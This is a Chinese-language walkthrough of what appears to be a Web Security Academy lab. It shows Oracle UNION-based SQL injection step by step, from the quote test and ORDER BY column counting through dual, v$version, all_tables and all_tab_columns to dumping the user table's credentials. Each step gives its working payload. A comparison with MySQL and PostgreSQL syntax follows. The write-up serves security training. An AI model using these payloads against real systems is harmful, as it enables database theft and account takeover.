Web Security Academy 第六关: Oracle 数据库 SQL 注入实战详解
前言SQL 联合查询注入是渗透测试中最常见的注入手段之一但不同数据库的语法、系统视图存在明显区别不能一套 Payload 通吃所有环境。上一篇文章我们完成了 PostgreSQL 靶场的注入实操本篇带来同系列 Oracle 数据库专项靶场场景同样是商品筛选页面 category 参数字符型注入。本文会完整复现从漏洞探测、列数判断、系统视图枚举到脱库拿管理员密码的全流程同时重点对比 Oracle 与 MySQL、PostgreSQL 的注入语法差异帮大家区分记忆不同数据库注入核心要点。一、探测注入点确认字符型注入漏洞1. 原始靶场页面正常访问分类页面/filter?categoryPets页面展示宠物商品存在可控 GET 参数 category。2. 单引号闭合测试触发 500 报错PayloadPetsURL 编码访问/filter?categoryPets%27页面返回Internal Server Error证明输入直接拼接 SQL无过滤存在注入漏洞。二、Order By 二分法判断页面回显字段数Union 查询要求前后字段数量一致使用order by探测列数测试 order by 3Payload order by 3--访问页面抛出 500 错误说明查询只有 2 列不存在第 3 列。测试 order by 2Payload order by 2--页面正常加载无报错确定页面 SQL 查询结果为 2 列后续 Union 必须填写 2 个字段。三、Oracle 专属 Union 查询基础探测Oracle 数据库和 MySQL 最大区别SELECT 语句必须带 FROM 子句无表查询需要使用虚表dual。1. dual 虚表占位测试验证两列回显Payload-1 union SELECT 1,2 FROM dual---1 让原分类查询无数据页面单独展示 Union 结果成功输出 1、2两列均可回显数据。2. 查询 Oracle 数据库版本Oracle 系统视图v$version存放数据库版本信息。Payload-1 union SELECT banner,2 FROM v$version--页面返回完整 Oracle 11g 版本信息确认后端数据库类型。四、枚举全库数据表Oracle 系统表 all_tables非 Oracle 使用information_schema.tablesOracle 使用all_tables存储所有表名。Payload-1 union SELECT table_name,2 FROM all_tables--页面批量输出库内全部数据表滚动页面找到业务用户表USERS_LYHIFM该表存储账号密码。五、枚举用户表字段Oracle 系统表 all_tab_columnsOracle 通过all_tab_columns查询字段限定表名筛选用户表字段。Payload UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_nameUSERS_LYHIFM--页面回显 3 个核心字段USERNAME_XSSQAE、PASSWORD_ZOFYAU、EMAIL对应账号、密码、邮箱。六、脱库获取管理员账号密码直接查询用户表用户名、密码字段。Payload UNION SELECT USERNAME_XSSQAE, PASSWORD_ZOFYAU FROM USERS_LYHIFM--页面输出全站所有账号凭证提取管理员信息用户名administrator密码27q6tcw3jlq4qgb6xwcb七、登录管理员账号完成靶场通关跳转网站登录页面填入获取到的管理员用户名与密码。登录成功进入个人中心页面弹出Congratulations, you solved the lab!靶场完成。实验总结Oracle vs MySQL/PostgreSQL 注入核心差异1. 基础语法区别Oracle SELECT 必须带 FROM无表查询使用虚表dualMySQL/PostgreSQL 可直接select 1,2无需 FROM。注释符通用--Oracle 不支持#单行注释。字符串大小写敏感表名、字段名匹配时大小写必须完全一致。2. 系统库枚举视图对比功能MySQL/PostgreSQLOracle枚举所有表information_schema.tablesall_tables枚举字段information_schema.columnsall_tab_columns查询数据库版本version()v$version3. 通用注入流程Oracle 专用单引号测试判断字符型注入order by 探测回显字段数量union select dual 虚表测试回显位查询 v$version 识别数据库枚举 all_tables 寻找用户表枚举 all_tab_columns 获取字段名查询用户表脱取管理员账号密码